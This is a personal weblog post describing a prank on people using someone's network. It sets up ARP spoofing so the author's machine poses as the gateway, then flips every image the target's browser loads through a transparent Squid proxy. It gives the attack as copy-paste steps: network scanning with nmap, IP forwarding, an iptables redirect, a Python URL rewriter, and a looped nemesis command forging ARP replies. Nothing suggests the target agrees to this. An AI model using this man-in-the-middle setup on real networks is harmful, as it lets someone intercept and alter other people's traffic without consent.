Weblog entry #1 for johns
The idea comes from http://www.ex-parrot.com/~pete/upside-down-ternet.html, which describes how to have fun with wireless freeloaders by flipping all images requested by their browser (there's a screenshot on the page).
In this article I'm going to describe how to do it in a different way - instead of modifying the gateway, I'm going to use ARP spoofing (also called ARP poisoning) to trick the target box into thinking that my box is the gateway.
(This article assumes that both the attacker and target are on the same private network.)
What are ARP and ARP spoofing anyway?
ARP, or Address Resolution Protocol, is used to translate IP addresses to Ethernet MAC addresses.
The kernel maintains an ARP cache that can be viewed by typing
/usr/sbin/arp. When you try to access an IP address that isn't in the cache, an ARP request (
"who has <IP>? tell <MAC>") is sent to broadcast. The target computer then sends back an ARP reply (
"<IP> is at <MAC>").
ARP is a stateless protocol, so one can easily send a spoofed ARP reply at any time.
For better and more complete descriptions:
Let's start by installing some prerequisites.
If you already have a HTTP server installed, or if you don't want to use httpd, remove it from the command below.
# apt-get install squid nemesis imagemagick thttpd
Squid is a caching HTTP proxy that has the nice feature of letting one define a script to rewrite URLs. Nemesis will be used for sending fake ARP replies, imagemagick for transforming images, and thttpd for serving transformed images to the proxy server.
# nano /usr/local/bin/squidupsidedown
Copy and paste the following code:
#!/usr/bin/env python import os, sys import urllib, re, subprocess outdir = '/var/www/squidupsidedown' wwwpath = 'http://localhost/squidupsidedown'; img_regex = re.compile(r'(?i).(jpg|jpeg|png|gif)$') operation = '-flip' # mogrify -help for more options operation = operation.split() count = 0 while True: l = raw_input().split(' ') url = l m = img_regex.search(url) if m: outname = '%d-%d.%s' % (os.getpid(), count, m.group(1)) outpath = os.path.join(outdir, outname) count += 1 try: urllib.urlretrieve(url, outpath) os.chmod(outpath, 0644) subprocess.call(['mogrify'] + operation + [outpath]) print '/'.join([wwwpath, outname]) except (IOError, urllib.ContentTooShortError): print url else: print url sys.stdout.flush()
Save the file.
# chmod +x /usr/local/bin/squidupsidedown
# mkdir /var/www/squidupsidedown
# chown proxy /var/www/squidupsidedown
squidupsidedown is a simple squid URL rewriter. Squid URL rewriters are expected to read a URL from stdin and write a (possibly changed) URL to stdout.
In this case, if the URL ends in
.jpg/.png/.gif, it is assumed to be a image and is downloaded to /var/www/squidupsidedown and transformed using mogrify. The URL
http://localhost/squidupsidedown/pid-count.ext is then passed to squid.
By default images are flipped, but any operation supported by mogrify (
-help) can be used.
We have to make a few changes to squid.
# nano /etc/squid/squid.conf
Around line 73:
http_port 3128 transparent
This enables transparent proxying.
Around line 2577 (substitute
192.168.26.0/24 with your network):
acl our_networks src 192.168.26.0/24
http_access allow our_networks
Around line 1464:
# invoke-rc.d squid restart
Enable IP forwarding in the kernel. This is necessary so that our box will work as a gateway, also for non-HTTP traffic, for the target.
# echo 1 > /proc/sys/net/ipv4/ip_forward
Enable transparent proxying. Substitute eth0 with the appropriate network interface.
# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 3128
With all the setup completed, it's time for the attack itself. Define the variables below, where my_macaddr is the MAC address of your (attacking) box, gw_ipaddr is the IP address of the gateway/router, target_macaddr is the MAC address of the target, and target_ipaddr is the IP address of the target.
To get these you can:
* nmap the network, you have to be root to see MAC addresses:
# nmap 192.168.26.1-
* Or if you know the IP address of the target:
$ ping -c 1 192.168.26.103; /usr/sbin/arp
To get your own MAC address type
Send a spoofed ARP reply. For more information on the arguments, type
nemesis arp help. Again, substitute eth0 with the appropriate network interface.
# nemesis arp -S $gw_ipaddr -D $target_ipaddr -h $my_macaddr -m $target_macaddr -r -d eth0 -H $my_macaddr -M $target_macaddr
The target will update its ARP cache occasionally. The above command will have to be repeated when it does (you can put the command in a loop).
On the target, type /usr/sbin/arp (linux) or arp (windows). If it worked, you should see your own MAC address instead of the gateway MAC address.
When testing remember that the browser caches images. If it doesn't appear to work, visit another page or clear the cache.
(This is my first post on debian-administration, so a brief introduction: My name is John, I'm 19 and a Linux user since 2002. This site has been very useful to me on multiple occasions, and hopefully this will be useful or at least entertaining to someone. Comments are welcome.)
Comments on this Entry